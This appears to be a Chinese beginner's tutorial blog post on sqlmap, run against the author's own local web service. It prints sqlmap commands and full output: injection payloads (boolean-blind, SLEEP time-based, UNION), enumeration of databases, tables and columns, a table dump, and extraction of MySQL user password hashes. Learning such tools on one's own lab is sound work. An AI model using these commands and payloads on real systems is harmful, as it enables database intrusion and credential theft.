sqlmap: 初体验
2021/5/14 19:58:58
本文主要是介绍sqlmap: 初体验,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
sqlmap
Sqlmap 是一个开源的渗透测试工具,可以自动检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它有一个强大的检测引擎,许多针对最终渗透测试人员的小众功能,以及从数据库指纹、从数据库获取数据、访问底层文件系统和通过带外连接在操作系统上执行命令等广泛的开关。
安装
pip install sqlmap
查看帮助文档
sqlmap -hh
中文文档
https://sqlmap.campfire.ga/
直连数据库
服务型数据库(mysql)
DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME
sqlmap -d "mysql://root:123456@127.0.0.1:3306/uniapp_shop" -f --banner --dbs --users
文件型数据库(sqlite)
DBMS://DATABASE_FILEPATH
sqlmap -d "sqlite3://D:\guangbaouni-testtools\apiTestDjango\db.sqlite3" -f --banner --dbs --tables
指定url扫
此处使用的是本地的服务,目的在于学习sqlmap的使用,请不要做违法的事情
扫描项目源码为: https://gitee.com/zy7y/uniapp_shop_server
1. 扫描注入点
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1
___
__H__
___ ___[,]_____ ___ ___ {1.5.5#pip}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:34:37 /2021-05-14/
[13:34:37] [INFO] resuming back-end DBMS 'mysql'
[13:34:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:34:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:34:37] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 13:34:37 /2021-05-14/
# Title: Generic UNION query (NULL) - 5 columns 注入点
2. 根据注入点查到全部数据库 --dbs
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --dbs
___
__H__
___ ___[']_____ ___ ___ {1.5.5#pip}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:40:12 /2021-05-14/
[13:40:12] [INFO] resuming back-end DBMS 'mysql'
[13:40:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:40:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:40:12] [INFO] fetching database names
available databases [6]:
[*] atplant
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] uniapp_shop
[13:40:12] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 13:40:12 /2021-05-14/
3. 根据指定数据库来查所有表
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant --tables
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant --tables
___
__H__
___ ___["]_____ ___ ___ {1.5.5#pip}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:45:07 /2021-05-14/
[13:45:07] [INFO] resuming back-end DBMS 'mysql'
[13:45:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:45:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:45:07] [INFO] fetching tables for database: 'atplant'
Database: atplant
[8 tables]
+-----------------+
| alembic_version |
| atp_cases |
| atp_envs |
| atp_interfaces |
| atp_projects |
| atp_reports |
| atp_tasks |
| atp_users |
+-----------------+
[13:45:07] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 13:45:07 /2021-05-14/
3.根据表来爆字段(mysql版本>5.0)
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant -T atp_users --columns
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant -T atp_users --columns
___
__H__
___ ___[.]_____ ___ ___ {1.5.5#pip}
|_ -| . [(] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:54:41 /2021-05-14/
[13:54:41] [INFO] resuming back-end DBMS 'mysql'
[13:54:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[13:54:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[13:54:41] [INFO] fetching columns for table 'atp_users' in database 'atplant'
Database: atplant
Table: atp_users
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int |
| name | varchar(30) |
| password | varchar(255) |
| username | varchar(128) |
+----------+--------------+
[13:54:41] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 13:54:41 /2021-05-14/
4. 根据字段名查到表中的数据
注意:当使用了--dump 已经触法了法律,请不要恶意攻击他人服务
命令:sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant -T atp_users -C username,password --dump
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 -D atplant -T atp_users -C username,password --dump
___
__H__
___ ___[.]_____ ___ ___ {1.5.5#pip}
|_ -| . [)] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:39:33 /2021-05-14/
[14:39:33] [INFO] resuming back-end DBMS 'mysql'
[14:39:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[14:39:33] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:39:33] [INFO] fetching entries of column(s) 'password,username' for table 'atp_users' in database 'atplant'
[14:39:33] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[14:39:33] [INFO] fetching number of column(s) 'password,username' entries for table 'atp_users' in database 'atplant'
[14:39:33] [INFO] resumed: 0
[14:39:33] [WARNING] table 'atp_users' in database 'atplant' appears to be empty
Database: atplant
Table: atp_users
[0 entries]
+----------+----------+
| username | password |
+----------+----------+
+----------+----------+
[14:39:33] [INFO] table 'atplant.atp_users' dumped to CSV file 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1\dump\atplant\atp_users.csv'
[14:39:33] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 14:39:33 /2021-05-14/
5. 获取当前数据库用户及hash密码
命令: sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords
(venv) D:\guangbaouni-testtools\sqlmaptools>sqlmap -u http://127.0.0.1/v1/getnews?newid=1 --passwords
___
__H__
___ ___[(]_____ ___ ___ {1.5.5#pip}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal l
aws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:40:02 /2021-05-14/
[14:40:02] [INFO] resuming back-end DBMS 'mysql'
[14:40:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: newid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: newid=13 AND 6236=6236
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: newid=13 AND (SELECT 8333 FROM (SELECT(SLEEP(5)))cUBu)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: newid=13 UNION ALL SELECT CONCAT(0x716a6a7a71,0x664e6179557179534a494d4b7a6a4b4263744562646f716151716744516c75476f6774666345424e,0x71786b7a71),NULL,NULL,NULL,NULL-- -
---
[14:40:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[14:40:02] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[14:40:05] [WARNING] no clear password(s) found
database management system users password hashes:
[*] develop [1]:
password hash: $A$005$~W\\u0005K\\u000b\\u0017d\\u0013\\u0002*4j_s Qg\\u0007\\u0015\\u0001GlIeJWW2iJzFpb0bGTlr5.6kBD1hAQt2iQefbUbepKD
[*] mysql.infoschema [1]:
password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.session [1]:
password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] mysql.sys [1]:
password hash: $A$005$THISISACOMBINATIONOFINVALIDSALTANDPASSWORDTHATMUSTNEVERBRBEUSED
[*] root [2]:
password hash: $A$005$\\u0013`|dCsg\\u0001^)_s\\u001dL\\u0010n-jx^61Eh8FZrw86xs/5fy7xSwpJ9rmmaZ9iyou1PCK74aRC
password hash: $A$005$z#r<]P\\u000eneGN\\u0014P_m\\u0007tk&av.YQwaEJ5AqX5Mv9.OiaWV/IlOiYM.C3veKIaAjpwq3
[14:40:05] [INFO] fetched data logged to text files under 'C:\Users\zy7y\AppData\Local\sqlmap\output\127.0.0.1'
[*] ending @ 14:40:05 /2021-05-14/
最后
请不要恶意使用其来攻击他人服务,不要触碰法律,高级用法请查看官方文档
参考资料
sqlmap中文文档
sql注入实战讲解
这篇关于sqlmap: 初体验的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-30掌握这些技巧,助你成为顶级产品经理
- 2024-11-30通义灵码 x 函数计算:构建高效开发流程,加速项目交付
- 2024-11-30高效团队的三大特质:高协作、高执行、高凝聚力
- 2024-11-30[开源]10.3k star!一款高颜值的后台管理系统,好用!
- 2024-11-30java最新版本是什么,有什么特性?-icode9专业技术文章分享
- 2024-11-30[开源]27.8K star!这款 Postman 替代工具太火了!
- 2024-11-30Gzip 压缩入门教程:轻松掌握文件压缩技巧
- 2024-11-29开源工具的魅力:让文档管理更“聪明”
- 2024-11-29Release-it开发入门教程
- 2024-11-29Rollup 插件入门教程:轻松掌握模块打包
